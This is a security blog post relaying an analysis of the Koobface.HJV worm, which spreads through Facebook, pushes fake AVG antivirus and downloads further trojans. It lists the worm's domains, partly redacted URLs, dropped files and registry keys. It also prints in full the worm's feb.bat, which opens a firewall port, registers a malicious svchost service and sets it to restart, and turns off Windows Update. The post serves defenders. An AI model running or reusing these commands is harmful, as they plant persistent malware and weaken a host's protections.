Koobface.HJV – Spreading in the wild via FACEBOOK

Posted on by

Well, last week I finally started a FaceBook account, today I find out about this, though it is no big surprise and why I try very hard to be careful when using a computer period.

Sonicwall Research team has discovered a new malicious Worm spreading in the wild. The Worm spreads via Facebook profiles and as part of its post-infection activity, it installs Fake AVG antivirus security software.

Upon installation the Worm informs the user that it needs to perform a “Scan” of the system:

It performs a fake system scan which is hosted on a Fake AV web page:

 
 

When clicking on “Remove all” or “Cancel” it attemps to initiate the download of:

•bitav_2053_ext6.exe [Detected as TDSS.ABCR (Trojan)]


The worm will periodically cause pop-up messages such as in the screenshot below:


When clicking OK to such pop-up messages the Worm will bring up further Fake AV pages which attempt to download more malware to the infected machine such as: pack.exe [Detected as SecurityTool.W (Trojan)]

Make sure your AntiVirus provides protection against this threat via the following signatures:

Koobface.HJV (Worm)
Koobface.HJV_2 (Worm)
Koobface.HJV_3 (Worm)
Koobface.FF (Trojan)
Delf.EM (Trojan)
TDSS.ABCR (Trojan)
SecurityTool.W (Trojan)

So if you see this happening, get off the internet, reboot your PC and run a complete system series of scans. Check out our past article on how to remove this type of infection.

?Here is some more technical jargon about it for those wishing to geek into it.

The Worm performs the following DNS queries:

•www.google.com
•facebook.com
•www.facebook.com
•d.static.ak.fbcdn.net
•x-treme-radio.host22.com
•www.ashiww.com
•www.wahdohotel.nl
•kingswoodwright.com
•kbfgb.greyzzsecure9.com
•3064972.greyzzsecure9.com
The Worm attempts to load various web pages using random page names with the .css extension:
•http://206.160.{removed}.9/rsrc.php/yW/r/Xx2bs9YPnF_.css
•http://206.160.{removed}.9/rsrc.php/ye/r/vOYlUxHAn95.css
•http://206.160.{removed}.9/rsrc.php/yS/r/w4doJXgUPVR.css
•http://206.160.{removed}.43/rsrc.php/yX/r/pWROpoRFF42.css
•http://206.160.{removed}.9/rsrc.php/y4/r/LIj01FurENH.css
•http://206.160.{removed}.9/rsrc.php/yE/r/4Kozs88a56s.css
•http://206.160.{removed}.43/rsrc.php/yQ/r/dvBK5Hfjbcc.css
•http://206.160.{removed}.43/rsrc.php/y-/r/Ki5kfy7_Bje.css
•http://206.160.{removed}.9/rsrc.php/yL/r/u8Bue217GRs.css
•http://206.160.{removed}.9/rsrc.php/yW/r/Xx2bs9YPnF_.css
The Worm installs the following files on the system:

•C:\Documents and Settings\{USER}\Local Settings\Temp\feb.bat
•C:\Documents and Settings\{USER}\Local Settings\Temp\zpskon_1296703528.exe [Detected as GAV: Koobface.FF (Trojan)]
•C:\Documents and Settings\{USER}\Local Settings\Temp\zpskon_1296699165.exe [Detected as GAV: Delf.EM (Trojan)]
•C:\WINDOWS\5456456z
•C:\WINDOWS\bt7.dat
•C:\WINDOWS\jjp156.exe [Detected as GAV: Koobface.HJV_2 (Worm)]
•C:\WINDOWS\system32\feb.dll [Detected as GAV: Koobface.HJV_3 (Worm)]
•C:\WINDOWS\system32\drivers\feb.sys [Detected as GAV: Koobface.FF (Trojan)]
feb.bat contains:
netsh firewall add allowedprogram name=”feb” program=”C:\WINDOWS\system32\svchost.exe” mode=enable
netsh firewall add portopening tcp 8087 feb enable
sc create “ffeb” type= interact type= share start= auto binpath= “C:\WINDOWS\system32\svchost.exe -k ffeb”
reg add “hklm\system\currentcontrolset\services\ffeb\parameters” /v servicedll /t reg_expand_sz /d “C:\WINDOWS\system32\feb.dll” /f
reg add “hklm\system\currentcontrolset\services\ffeb” /v failureactions /t reg_binary /d 00000000000000000000000003000000140000000100000060ea00000100000060ea00000100000060ea0000 /f
reg add “hklm\software\microsoft\windows nt\currentversion\svchost” /v ffeb /t reg_multi_sz /d “ffeb\0” /f
sc start ffeb
feb.dll contains a list or URL’s all of which are either taken down or lead to blank pages at the time of writing. Below is a sample of the URL’s contained feb.dll:
•impri{removed}.gr/.lhinrs/
•hk{removed}.org/.ycguh3/
•roomservi{removed}.com.au/.9mov05w/
•nubs.wo{removed}.co.uk/.7txq/
•lenga{removed}.com/.ck5rg8/
•cayenneo{removed}.com/.fplf/
•www.dead{removed}.co.uk/.qe9v/
•ib{removed}.org.il/.5cei7f9/
•www.kurdist{removed}.com/.x5fyik/
•heali{removed}.co.za/.12vatd/
•forwardmar{removed}.org/.6sta03t/
•numerus-{removed}.fr/.li81/
•fino{removed}.com/.ea2cuwa/
•fe{removed}.co.za/.jts51/
•tarr{removed}.com/.5fu3/
•toppla{removed}.nl/.vfnc/
•www.fishingfo{removed}.com/.5wmm9/
The worm installs the following registry keys to ensure startup of jjp156.exe and the feb.sys driver:
•HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer NoAutoUpdate dword:00000001
•HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer NoWindowsUpdate dword:00000001
•HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost ffeb hex(7):66,66,65,62,00,00,
•HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dfg49df “c:\windows\jjp156.exe”
•HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_FEB NextInstance dword:00000001
•HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_FEB\0000 Service “feb”
•HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\feb ImagePath hex(2):”\??\C:\WINDOWS\system32\drivers\feb.sys”

Leave a Reply

Your email address will not be published. Required fields are marked *